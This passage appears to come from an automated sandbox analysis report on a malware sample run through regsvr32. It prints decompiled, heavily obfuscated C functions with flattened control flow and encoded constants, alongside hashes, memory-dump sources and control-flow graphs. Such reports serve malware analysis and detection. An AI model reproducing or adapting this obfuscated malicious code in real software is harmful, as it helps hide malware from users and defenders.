                                                                                                                				signed int _v1096;
                                                                                                                				signed int _v1100;
                                                                                                                				signed int _v1104;
                                                                                                                				signed int _v1108;
                                                                                                                				signed int _v1112;
                                                                                                                				signed int _v1116;
                                                                                                                				signed int _v1120;
                                                                                                                				signed int _v1124;
                                                                                                                				signed int _v1128;
                                                                                                                				signed int _v1132;
                                                                                                                				signed int _v1136;
                                                                                                                				signed int _v1140;
                                                                                                                				signed int _v1144;
                                                                                                                				signed int _v1148;
                                                                                                                				signed int _v1152;
                                                                                                                				signed int _v1156;
                                                                                                                				signed int _v1160;
                                                                                                                				signed int _v1164;
                                                                                                                				signed int _v1168;
                                                                                                                				signed int _v1172;
                                                                                                                				signed int _v1176;
                                                                                                                				signed int _v1180;
                                                                                                                				signed int _v1184;
                                                                                                                				signed int _v1188;
                                                                                                                				signed int _v1192;
                                                                                                                				signed int _v1196;
                                                                                                                				signed int _v1200;
                                                                                                                				signed int _v1204;
                                                                                                                				void* _t302;
                                                                                                                				void* _t324;
                                                                                                                				void* _t325;
                                                                                                                				intOrPtr _t326;
                                                                                                                				intOrPtr _t329;
                                                                                                                				void* _t333;
                                                                                                                				intOrPtr _t336;
                                                                                                                				intOrPtr _t338;
                                                                                                                				void* _t347;
                                                                                                                				intOrPtr _t378;
                                                                                                                				signed int _t379;
                                                                                                                				signed int _t380;
                                                                                                                				signed int _t381;
                                                                                                                				signed int _t382;
                                                                                                                				signed int _t383;
                                                                                                                				signed int _t384;
                                                                                                                				signed int* _t389;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t302);
                                                                                                                				_v1056 = 0x99f1aa;
                                                                                                                				_t389 =  &(( &_v1204)[3]);
                                                                                                                				_v1052 = 0x8701ff;
                                                                                                                				_v1048 = 0;
                                                                                                                				_t378 = 0;
                                                                                                                				_v1044 = 0;
                                                                                                                				_t347 = 0xc564c88;
                                                                                                                				_v1164 = 0xc039a4;
                                                                                                                				_v1164 = _v1164 + 0xffff1059;
                                                                                                                				_v1164 = _v1164 >> 0xa;
                                                                                                                				_v1164 = _v1164 ^ 0x00002ffb;
                                                                                                                				_v1156 = 0xaa2a1c;
                                                                                                                				_v1156 = _v1156 | 0xac4eb8d1;
                                                                                                                				_v1156 = _v1156 >> 9;
                                                                                                                				_v1156 = _v1156 ^ 0x005679db;
                                                                                                                				_v1132 = 0xf7dd83;
                                                                                                                				_v1132 = _v1132 + 0xffff50f8;
                                                                                                                				_v1132 = _v1132 ^ 0x00fc089d;
                                                                                                                				_v1176 = 0xb5c700;
                                                                                                                				_v1176 = _v1176 << 4;
                                                                                                                				_v1176 = _v1176 + 0xbfb1;
                                                                                                                				_v1176 = _v1176 ^ 0x0b58c49d;
                                                                                                                				_v1124 = 0x35efdf;
                                                                                                                				_v1124 = _v1124 + 0xffff7781;
                                                                                                                				_v1124 = _v1124 ^ 0x00315ebe;
                                                                                                                				_v1200 = 0x2f7af8;
                                                                                                                				_t379 = 0x28;
                                                                                                                				_v1200 = _v1200 * 0x7f;
                                                                                                                				_v1200 = _v1200 ^ 0x8956e2bd;
                                                                                                                				_v1200 = _v1200 + 0xffff0d53;
                                                                                                                				_v1200 = _v1200 ^ 0x9edf5615;
                                                                                                                				_v1172 = 0x66383;
                                                                                                                				_v1172 = _v1172 | 0xa3718ef9;
                                                                                                                				_v1172 = _v1172 >> 1;
                                                                                                                				_v1172 = _v1172 ^ 0x51b9cd0e;
                                                                                                                				_v1184 = 0x12b320;
                                                                                                                				_v1184 = _v1184 / _t379;
                                                                                                                				_v1184 = _v1184 >> 3;
                                                                                                                				_v1184 = _v1184 ^ 0x868f222a;
                                                                                                                				_v1184 = _v1184 ^ 0x8687ae68;
                                                                                                                				_v1148 = 0xfbe844;
                                                                                                                				_v1148 = _v1148 + 0xffff1a0d;
                                                                                                                				_v1148 = _v1148 ^ 0xc848fe34;
                                                                                                                				_v1148 = _v1148 ^ 0xc8bbdde4;
                                                                                                                				_v1068 = 0x71037b;
                                                                                                                				_v1068 = _v1068 | 0x53037419;
                                                                                                                				_v1068 = _v1068 ^ 0x5379ba89;
                                                                                                                				_v1116 = 0xd0f175;
                                                                                                                				_v1116 = _v1116 << 2;
                                                                                                                				_v1116 = _v1116 ^ 0x0347dcc0;
                                                                                                                				_v1084 = 0x5e84e5;
                                                                                                                				_v1084 = _v1084 | 0xaea73dae;
                                                                                                                				_v1084 = _v1084 ^ 0xaefdc12b;
                                                                                                                				_v1140 = 0xa17ac3;
                                                                                                                				_v1140 = _v1140 ^ 0xd2076937;
                                                                                                                				_v1140 = _v1140 ^ 0xd2af841d;
                                                                                                                				_v1160 = 0xf1f8ae;
                                                                                                                				_v1160 = _v1160 * 0x33;
                                                                                                                				_v1160 = _v1160 ^ 0x9d2c5a39;
                                                                                                                				_v1160 = _v1160 ^ 0xad137846;
                                                                                                                				_v1192 = 0x93e357;
                                                                                                                				_v1192 = _v1192 | 0x5f8ce43c;
                                                                                                                				_v1192 = _v1192 ^ 0xfdb5c039;
                                                                                                                				_v1192 = _v1192 >> 9;
                                                                                                                				_v1192 = _v1192 ^ 0x005c06f0;
                                                                                                                				_v1168 = 0x121292;
                                                                                                                				_v1168 = _v1168 ^ 0xcdaf1c48;
                                                                                                                				_v1168 = _v1168 >> 0xf;
                                                                                                                				_v1168 = _v1168 ^ 0x0005297f;
                                                                                                                				_v1076 = 0x35300b;
                                                                                                                				_t380 = 0x24;
                                                                                                                				_v1076 = _v1076 * 0x36;
                                                                                                                				_v1076 = _v1076 ^ 0x0b31a6d2;
                                                                                                                				_v1108 = 0xaabbde;
                                                                                                                				_v1108 = _v1108 / _t380;
                                                                                                                				_v1108 = _v1108 ^ 0x000dc4c6;
                                                                                                                				_v1060 = 0xe746e7;
                                                                                                                				_v1060 = _v1060 + 0xddd0;
                                                                                                                				_v1060 = _v1060 ^ 0x00ebb1cd;
                                                                                                                				_v1204 = 0x1bfeae;
                                                                                                                				_t381 = 0x60;
                                                                                                                				_v1204 = _v1204 / _t381;
                                                                                                                				_v1204 = _v1204 | 0x6dffdf7c;
                                                                                                                				_v1204 = _v1204 ^ 0x6df2c332;
                                                                                                                				_v1092 = 0x337b21;
                                                                                                                				_t147 =  &_v1092; // 0x337b21
                                                                                                                				_t382 = 0x55;
                                                                                                                				_v1092 =  *_t147 * 0x44;
                                                                                                                				_v1092 = _v1092 ^ 0x0dae2e10;
                                                                                                                				_v1064 = 0x6d6ee7;
                                                                                                                				_v1064 = _v1064 << 7;
                                                                                                                				_v1064 = _v1064 ^ 0x36bedcee;
                                                                                                                				_v1100 = 0x380160;
                                                                                                                				_v1100 = _v1100 << 2;
                                                                                                                				_v1100 = _v1100 ^ 0x00e51ec2;
                                                                                                                				_v1196 = 0xf78bf4;
                                                                                                                				_v1196 = _v1196 ^ 0x3990821c;
                                                                                                                				_v1196 = _v1196 / _t382;
                                                                                                                				_v1196 = _v1196 << 0xe;
                                                                                                                				_v1196 = _v1196 ^ 0x3876bd87;
                                                                                                                				_v1120 = 0xec6407;
                                                                                                                				_v1120 = _v1120 >> 2;
                                                                                                                				_v1120 = _v1120 ^ 0x003a352f;
                                                                                                                				_v1180 = 0x6d7f05;
                                                                                                                				_v1180 = _v1180 ^ 0x64a045e7;
                                                                                                                				_t383 = 0x5c;
                                                                                                                				_v1180 = _v1180 * 0x36;
                                                                                                                				_v1180 = _v1180 << 1;
                                                                                                                				_v1180 = _v1180 ^ 0x8696e2e4;
                                                                                                                				_v1128 = 0x945e36;
                                                                                                                				_v1128 = _v1128 | 0x8dbb4251;
                                                                                                                				_v1128 = _v1128 ^ 0x8db3d187;
                                                                                                                				_v1188 = 0xca501a;
                                                                                                                				_v1188 = _v1188 / _t383;
                                                                                                                				_v1188 = _v1188 * 0x16;
                                                                                                                				_v1188 = _v1188 | 0x13b8981e;
                                                                                                                				_v1188 = _v1188 ^ 0x13b71f6c;
                                                                                                                				_v1136 = 0x61c6d1;
                                                                                                                				_v1136 = _v1136 + 0xe841;
                                                                                                                				_v1136 = _v1136 ^ 0x00601ade;
                                                                                                                				_v1104 = 0x5d035a;
                                                                                                                				_v1104 = _v1104 << 0xf;
                                                                                                                				_v1104 = _v1104 ^ 0x81a8b5c6;
                                                                                                                				_v1144 = 0x8f9944;
                                                                                                                				_v1144 = _v1144 | 0xdee19e20;
                                                                                                                				_t384 = 0x3c;
                                                                                                                				_v1144 = _v1144 / _t384;
                                                                                                                				_v1144 = _v1144 ^ 0x03b004e7;
                                                                                                                				_v1112 = 0x412e10;
                                                                                                                				_v1112 = _v1112 | 0x1ab18f6f;
                                                                                                                				_v1112 = _v1112 ^ 0x1af3d5bd;
                                                                                                                				_v1152 = 0xaf613c;
                                                                                                                				_v1152 = _v1152 + 0xfb85;
                                                                                                                				_v1152 = _v1152 | 0xe6439941;
                                                                                                                				_v1152 = _v1152 ^ 0xe6f7183d;
                                                                                                                				_v1072 = 0xe2848b;
                                                                                                                				_v1072 = _v1072 >> 2;
                                                                                                                				_v1072 = _v1072 ^ 0x00367d60;
                                                                                                                				_v1080 = 0xf0f251;
                                                                                                                				_v1080 = _v1080 * 0x6a;
                                                                                                                				_v1080 = _v1080 ^ 0x63cdbe63;
                                                                                                                				_v1088 = 0x7c1c45;
                                                                                                                				_v1088 = _v1088 | 0x67884939;
                                                                                                                				_v1088 = _v1088 ^ 0x67ffa2cf;
                                                                                                                				_v1096 = 0x6bc56e;
                                                                                                                				_v1096 = _v1096 + 0xf15f;
                                                                                                                				_v1096 = _v1096 ^ 0x0061c90b;
                                                                                                                				while(_t347 != 0xd93bea) {
                                                                                                                					if(_t347 == 0xf67f27) {
                                                                                                                						_push(_v1196);
                                                                                                                						_push(0x1a114c);
                                                                                                                						_push(_v1100);
                                                                                                                						_t325 = E001BF5D9(_v1092, _v1064, __eflags);
                                                                                                                						_t326 =  *0x1c4c10; // 0x67d820
                                                                                                                						_t329 =  *0x1c4c10; // 0x67d820
                                                                                                                						E001C224C(_v1120, __eflags, _t329 + 0x20c,  &_v1040, _v1180, _v1128, 0, _t325, 0x104, _v1188, _v1136, _t326 + 4);
                                                                                                                						E001BF94B(_t325, _v1104, _v1144, _v1112, _v1152);
                                                                                                                						_t389 =  &(_t389[0x10]);
                                                                                                                						goto L7;
                                                                                                                					} else {
                                                                                                                						if(_t347 == 0xa2728a4) {
                                                                                                                							_push(_v1068);
                                                                                                                							_push(0x1a10bc);
                                                                                                                							_push(_v1148);
                                                                                                                							_t333 = E001BF5D9(_v1172, _v1184, __eflags);
                                                                                                                							_t336 =  *0x1c4c10; // 0x67d820
                                                                                                                							_t338 =  *0x1c4c10; // 0x67d820
                                                                                                                							__eflags = _t338 + 4;
                                                                                                                							E001AD467(_v1084, _t338 + 4, _v1140, _t338 + 4, _v1172, _v1160, _t336 + 0x20c, _v1192, _t333,  &_v520,  &_v1040, _v1168);
                                                                                                                							E001BF94B(_t333, _v1076, _v1108, _v1060, _v1204);
                                                                                                                							_t389 =  &(_t389[0x10]);
                                                                                                                							L7:
                                                                                                                							_t347 = 0xd93bea;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t347 == 0xc564c88) {
                                                                                                                								_t263 =  &_v1132; // 0x3a352f
                                                                                                                								E001A3466(_v1164, _v1156, _t347, _t347,  &_v1040,  *_t263, _t347, _v1176, _v1124, _v1200);
                                                                                                                								_t389 =  &(_t389[8]);
                                                                                                                								_t347 = 0xa2728a4;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L10:
                                                                                                                					__eflags = _t347 - 0x1f211b4;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					return _t378;
                                                                                                                				}
                                                                                                                				_t324 = E001B4E54(_v1072, 0, __eflags,  &_v520, 0, _v1080, 0, _v1088, _t347, _v1096); // executed
                                                                                                                				_t389 =  &(_t389[7]);
                                                                                                                				__eflags = _t324;
                                                                                                                				_t378 =  !=  ? 1 : _t378;
                                                                                                                				_t347 = 0x1f211b4;
                                                                                                                				goto L10;
                                                                                                                			}
































































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !{3$/5:$A$`}6$F$nm
                                                                                                                • API String ID: 0-387362328
                                                                                                                • Opcode ID: 9eb0974d5bf3201c5978d6bac67d8f7caa8b08458dc87043ec3661be237ecdac
                                                                                                                • Instruction ID: c3f381614f46ecb9ff534d8c3c976f84a46fd74edfac6333589299588d7d5da0
                                                                                                                • Opcode Fuzzy Hash: 9eb0974d5bf3201c5978d6bac67d8f7caa8b08458dc87043ec3661be237ecdac
                                                                                                                • Instruction Fuzzy Hash: CFF101B1109380DFD368CF66C94AA9BBBE1FBC4758F10891DF19A96260C7B18949DF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 583 1b8131-1b8587 call 1b1919 586 1b858c-1b858e 583->586 587 1b8653-1b86db call 1bf5d9 call 1acca2 call 1ad467 call 1bf94b 586->587 588 1b8594-1b859a 586->588 596 1b86dd-1b86e3 587->596 590 1b864c-1b864e 588->590 591 1b85a0-1b85a2 588->591 590->586 593 1b85d8-1b8647 call 1bf5d9 call 1b8eb3 call 1bf94b 591->593 594 1b85a4-1b85a6 591->594 593->586 594->596 597 1b85ac-1b85c6 call 1a4b40 594->597 596->586 601 1b86e9 596->601 604 1b85cb-1b85d7 597->604 601->601
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001B8131() {
                                                                                                                				char _v520;
                                                                                                                				char _v1040;
                                                                                                                				signed int _v1044;
                                                                                                                				intOrPtr _v1048;
                                                                                                                				signed int _v1052;
                                                                                                                				signed int _v1056;
                                                                                                                				signed int _v1060;
                                                                                                                				signed int _v1064;
                                                                                                                				signed int _v1068;
                                                                                                                				signed int _v1072;
                                                                                                                				signed int _v1076;
                                                                                                                				signed int _v1080;
                                                                                                                				signed int _v1084;
                                                                                                                				signed int _v1088;
                                                                                                                				signed int _v1092;
                                                                                                                				signed int _v1096;
                                                                                                                				signed int _v1100;
                                                                                                                				signed int _v1104;
                                                                                                                				signed int _v1108;
                                                                                                                				signed int _v1112;
                                                                                                                				signed int _v1116;
                                                                                                                				signed int _v1120;
                                                                                                                				signed int _v1124;
                                                                                                                				signed int _v1128;
                                                                                                                				signed int _v1132;
                                                                                                                				signed int _v1136;
                                                                                                                				signed int _v1140;
                                                                                                                				unsigned int _v1144;
                                                                                                                				signed int _v1148;
                                                                                                                				signed int _v1152;
                                                                                                                				signed int _v1156;
                                                                                                                				signed int _v1160;
                                                                                                                				signed int _v1164;
                                                                                                                				signed int _v1168;
                                                                                                                				signed int _v1172;
                                                                                                                				void* _t316;
                                                                                                                				void* _t317;
                                                                                                                				intOrPtr _t318;
                                                                                                                				void* _t321;
                                                                                                                				void* _t322;
                                                                                                                				void* _t326;
                                                                                                                				signed int _t328;
                                                                                                                				signed int _t329;
                                                                                                                				signed int _t330;
                                                                                                                				signed int _t331;
                                                                                                                				intOrPtr _t334;
                                                                                                                				intOrPtr _t340;
                                                                                                                				signed int _t365;
                                                                                                                				void* _t367;
                                                                                                                				signed int* _t371;
                                                                                                                
                                                                                                                				_t371 =  &_v1172;
                                                                                                                				_v1044 = _v1044 & 0x00000000;
                                                                                                                				_v1048 = 0x6b2cb2;
                                                                                                                				_v1144 = 0xdf1e28;
                                                                                                                				_v1144 = _v1144 + 0xcf18;
                                                                                                                				_v1144 = _v1144 + 0xffffd4d3;
                                                                                                                				_v1144 = _v1144 >> 0xf;
                                                                                                                				_v1144 = _v1144 ^ 0x0003f4b3;
                                                                                                                				_v1168 = 0x29791d;
                                                                                                                				_v1168 = _v1168 << 0xd;
                                                                                                                				_v1168 = _v1168 + 0xb6c9;
                                                                                                                				_v1168 = _v1168 ^ 0x935d68f1;
                                                                                                                				_v1168 = _v1168 ^ 0xbc7be9a6;
                                                                                                                				_v1128 = 0xcaea19;
                                                                                                                				_v1128 = _v1128 + 0xfffffdf5;
                                                                                                                				_v1128 = _v1128 ^ 0x180c7b01;
                                                                                                                				_v1128 = _v1128 | 0x774c3fed;
                                                                                                                				_v1128 = _v1128 ^ 0x7fc60f58;
                                                                                                                				_v1160 = 0xe311fe;
                                                                                                                				_v1160 = _v1160 >> 6;
                                                                                                                				_v1160 = _v1160 * 0x53;
                                                                                                                				_t367 = 0x1abb79c;
                                                                                                                				_v1160 = _v1160 + 0xffff7b19;
                                                                                                                				_v1160 = _v1160 ^ 0x01252154;
                                                                                                                				_v1076 = 0xebae3a;
                                                                                                                				_v1076 = _v1076 + 0x107;
                                                                                                                				_v1076 = _v1076 ^ 0x46a095c3;
                                                                                                                				_v1076 = _v1076 ^ 0x4644cb0e;
                                                                                                                				_v1072 = 0x85dda9;
                                                                                                                				_v1072 = _v1072 | 0x9d69c676;
                                                                                                                				_v1072 = _v1072 ^ 0x9de25c8c;
                                                                                                                				_v1152 = 0xb5bfbd;
                                                                                                                				_v1152 = _v1152 + 0xffff2814;
                                                                                                                				_v1152 = _v1152 ^ 0x1e8d4eba;
                                                                                                                				_t328 = 0x69;
                                                                                                                				_v1152 = _v1152 * 0x7f;
                                                                                                                				_v1152 = _v1152 ^ 0xfe9f8319;
                                                                                                                				_v1108 = 0x685693;
                                                                                                                				_v1108 = _v1108 ^ 0x20ef93da;
                                                                                                                				_v1108 = _v1108 * 0x31;
                                                                                                                				_v1108 = _v1108 ^ 0x39fb8cf1;
                                                                                                                				_v1084 = 0xecaf96;
                                                                                                                				_v1084 = _v1084 | 0xdf21f2ea;
                                                                                                                				_v1084 = _v1084 ^ 0x194ea3ef;
                                                                                                                				_v1084 = _v1084 ^ 0xc6a19d33;
                                                                                                                				_v1056 = 0xb57338;
                                                                                                                				_v1056 = _v1056 | 0x17408f00;
                                                                                                                				_v1056 = _v1056 ^ 0x17fcd759;
                                                                                                                				_v1120 = 0x13bab4;
                                                                                                                				_v1120 = _v1120 >> 0x10;
                                                                                                                				_v1120 = _v1120 + 0xffff5347;
                                                                                                                				_v1120 = _v1120 ^ 0xfffbd67b;
                                                                                                                				_v1060 = 0x61f084;
                                                                                                                				_v1060 = _v1060 + 0xffffdd40;
                                                                                                                				_v1060 = _v1060 ^ 0x006f53a4;
                                                                                                                				_v1172 = 0xe70070;
                                                                                                                				_v1172 = _v1172 * 0x5c;
                                                                                                                				_v1172 = _v1172 | 0x75941c4b;
                                                                                                                				_v1172 = _v1172 << 0xd;
                                                                                                                				_v1172 = _v1172 ^ 0x878ed615;
                                                                                                                				_v1136 = 0xc73169;
                                                                                                                				_v1136 = _v1136 + 0xffff433e;
                                                                                                                				_v1136 = _v1136 << 0xa;
                                                                                                                				_v1136 = _v1136 / _t328;
                                                                                                                				_v1136 = _v1136 ^ 0x0038869b;
                                                                                                                				_v1080 = 0x701085;
                                                                                                                				_v1080 = _v1080 * 0x6f;
                                                                                                                				_v1080 = _v1080 << 0xa;
                                                                                                                				_v1080 = _v1080 ^ 0x5ca7429b;
                                                                                                                				_v1096 = 0xe41417;
                                                                                                                				_v1096 = _v1096 >> 0xa;
                                                                                                                				_v1096 = _v1096 << 1;
                                                                                                                				_v1096 = _v1096 ^ 0x0008f991;
                                                                                                                				_v1088 = 0x9b9e84;
                                                                                                                				_t329 = 0x5e;
                                                                                                                				_v1088 = _v1088 / _t329;
                                                                                                                				_v1088 = _v1088 + 0xd43e;
                                                                                                                				_v1088 = _v1088 ^ 0x000462a9;
                                                                                                                				_v1164 = 0x3b3baa;
                                                                                                                				_v1164 = _v1164 + 0xffffcbce;
                                                                                                                				_t365 = 0x71;
                                                                                                                				_t330 = 0x7b;
                                                                                                                				_v1164 = _v1164 * 0x62;
                                                                                                                				_v1164 = _v1164 + 0xffffd6df;
                                                                                                                				_v1164 = _v1164 ^ 0x169bc0cc;
                                                                                                                				_v1156 = 0x7103a;
                                                                                                                				_v1156 = _v1156 + 0x1689;
                                                                                                                				_v1156 = _v1156 << 0xd;
                                                                                                                				_v1156 = _v1156 << 2;
                                                                                                                				_v1156 = _v1156 ^ 0x9367905f;
                                                                                                                				_v1112 = 0xd3a173;
                                                                                                                				_v1112 = _v1112 / _t365;
                                                                                                                				_v1112 = _v1112 << 6;
                                                                                                                				_v1112 = _v1112 ^ 0x007359ec;
                                                                                                                				_v1116 = 0x739f6a;
                                                                                                                				_v1116 = _v1116 + 0xffffa10d;
                                                                                                                				_v1116 = _v1116 / _t330;
                                                                                                                				_v1116 = _v1116 ^ 0x00014f63;
                                                                                                                				_v1092 = 0x27a344;
                                                                                                                				_v1092 = _v1092 | 0xeff694b3;
                                                                                                                				_t331 = 0x5a;
                                                                                                                				_v1092 = _v1092 / _t331;
                                                                                                                				_v1092 = _v1092 ^ 0x02a94158;
                                                                                                                				_v1100 = 0x7bae75;
                                                                                                                				_v1100 = _v1100 | 0xfd3ff6f7;
                                                                                                                				_v1100 = _v1100 ^ 0xfd712049;
                                                                                                                				_v1052 = 0xb083d3;
                                                                                                                				_v1052 = _v1052 << 0xf;
                                                                                                                				_v1052 = _v1052 ^ 0x41e993e9;
                                                                                                                				_v1104 = 0x1e61b7;
                                                                                                                				_v1104 = _v1104 / _t365;
                                                                                                                				_v1104 = _v1104 + 0x1a94;
                                                                                                                				_v1104 = _v1104 ^ 0x000da602;
                                                                                                                				_v1132 = 0xda7a20;
                                                                                                                				_v1132 = _v1132 + 0x33e0;
                                                                                                                				_v1132 = _v1132 * 0x2d;
                                                                                                                				_v1132 = _v1132 << 0xe;
                                                                                                                				_v1132 = _v1132 ^ 0x2587e93b;
                                                                                                                				_v1140 = 0xca4d0;
                                                                                                                				_v1140 = _v1140 | 0x65cdfee7;
                                                                                                                				_v1140 = _v1140 * 0x60;
                                                                                                                				_v1140 = _v1140 ^ 0x2d3cf690;
                                                                                                                				_v1148 = 0x2607a1;
                                                                                                                				_v1148 = _v1148 >> 4;
                                                                                                                				_v1148 = _v1148 << 0xa;
                                                                                                                				_v1148 = _v1148 >> 0x10;
                                                                                                                				_v1148 = _v1148 ^ 0x00047d85;
                                                                                                                				_v1068 = 0xdd65e4;
                                                                                                                				_v1068 = _v1068 * 0x56;
                                                                                                                				_v1068 = _v1068 ^ 0x4a6596cb;
                                                                                                                				_v1064 = 0x21593c;
                                                                                                                				_v1064 = _v1064 + 0xffffdc6d;
                                                                                                                				_v1064 = _v1064 ^ 0x00237daf;
                                                                                                                				_v1124 = 0x9ac0c8;
                                                                                                                				_v1124 = _v1124 * 0x4b;
                                                                                                                				_v1124 = _v1124 + 0x45ed;
                                                                                                                				_v1124 = _v1124 ^ 0xb4e068ff;
                                                                                                                				_v1124 = _v1124 ^ 0x99b8f257;
                                                                                                                				E001B1919(_t331);
                                                                                                                				do {
                                                                                                                					while(_t367 != 0x1741c98) {
                                                                                                                						if(_t367 == 0x1abb79c) {
                                                                                                                							_t367 = 0x8ef32e4;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t367 == 0x8ef32e4) {
                                                                                                                							_push(_v1072);
                                                                                                                							_push(0x1a109c);
                                                                                                                							_push(_v1076);
                                                                                                                							_t322 = E001BF5D9(_v1128, _v1160, __eflags);
                                                                                                                							_t340 =  *0x1c4c10; // 0x67d820
                                                                                                                							_t270 = _t340 + 4; // 0x67d824
                                                                                                                							E001B8EB3(_t270, __eflags, _v1152, _v1128, _v1108,  &_v1040, _v1084, _t322, _v1056);
                                                                                                                							_t321 = E001BF94B(_t322, _v1120, _v1060, _v1172, _v1136);
                                                                                                                							_t371 =  &(_t371[0xd]);
                                                                                                                							_t367 = 0x1741c98;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_t378 = _t367 - 0xdc9eabd;
                                                                                                                						if(_t367 != 0xdc9eabd) {
                                                                                                                							goto L10;
                                                                                                                						}
                                                                                                                						_t326 = E001A4B40( &_v520, _v1064, _t378,  &_v1040, _v1124); // executed
                                                                                                                						return _t326;
                                                                                                                					}
                                                                                                                					_push(_v1164);
                                                                                                                					_push(0x1a10ec);
                                                                                                                					_push(_v1088);
                                                                                                                					_t316 = E001BF5D9(_v1080, _v1096, __eflags);
                                                                                                                					_t317 = E001ACCA2();
                                                                                                                					_t334 =  *0x1c4c10; // 0x67d820
                                                                                                                					_t318 =  *0x1c4c10; // 0x67d820
                                                                                                                					__eflags = _t318 + 0x20c;
                                                                                                                					E001AD467(_v1116, _t318 + 0x20c, _v1092, _t318 + 0x20c,  &_v520, _v1100, _t317, _v1052, _t316,  &_v520, _t334 + 4, _v1104);
                                                                                                                					_t321 = E001BF94B(_t316, _v1132, _v1140, _v1148, _v1068);
                                                                                                                					_t371 =  &(_t371[0x10]);
                                                                                                                					_t367 = 0xdc9eabd;
                                                                                                                					L10:
                                                                                                                					__eflags = _t367 - 0x555d914;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				return _t321;
                                                                                                                			}

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: <Y!$p$3$?Lw$E$Ys
                                                                                                                • API String ID: 0-486402316
                                                                                                                • Opcode ID: f009b5e111727fd6940bae5d567a1937b328a1663b213133a31555cd5f3470ea
                                                                                                                • Instruction ID: e200723b0c1c0f7547509fe4d78387fd28dcc1cf53c73f82bf5ce43ca48b5ecf
                                                                                                                • Opcode Fuzzy Hash: f009b5e111727fd6940bae5d567a1937b328a1663b213133a31555cd5f3470ea
                                                                                                                • Instruction Fuzzy Hash: B0E100B14083819FC368CF66C58A54BFBE1BBC4758F108A1DF2EA86260D7B58949CF47
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 643 1b416e-1b4686 644 1b468e 643->644 645 1b4694 644->645 646 1b4699-1b469f 645->646 647 1b4838-1b485a call 1b2519 646->647 648 1b46a5-1b46a7 646->648 657 1b485f-1b4865 647->657 650 1b47ed-1b4816 call 1a9291 648->650 651 1b46ad-1b46b3 648->651 656 1b481b-1b4822 650->656 654 1b46b9-1b46bf 651->654 655 1b4771-1b47b6 call 1bf5d9 call 1ad2c9 651->655 659 1b4701-1b4748 call 1a303a * 2 654->659 660 1b46c1-1b46c3 654->660 673 1b47bb-1b47eb call 1bf94b 655->673 663 1b4831-1b4833 656->663 664 1b4824-1b482c 656->664 661 1b486a-1b4870 657->661 675 1b474d-1b476c 659->675 660->661 662 1b46c9-1b4700 call 1b17d2 * 2 660->662 661->646 669 1b4876 661->669 663->644 664->644 669->669 673->657 675->645
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001B416E() {
                                                                                                                				signed int _v4;
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				char _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				unsigned int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				unsigned int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				unsigned int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				void* _t370;
                                                                                                                				intOrPtr _t372;
                                                                                                                				void* _t373;
                                                                                                                				void* _t376;
                                                                                                                				intOrPtr _t383;
                                                                                                                				intOrPtr _t388;
                                                                                                                				intOrPtr _t389;
                                                                                                                				void* _t393;
                                                                                                                				signed int _t395;
                                                                                                                				signed int _t396;
                                                                                                                				signed int _t397;
                                                                                                                				signed int _t398;
                                                                                                                				signed int _t399;
                                                                                                                				signed int _t400;
                                                                                                                				signed int _t401;
                                                                                                                				signed int _t402;
                                                                                                                				signed int _t403;
                                                                                                                				signed int _t405;
                                                                                                                				intOrPtr _t434;
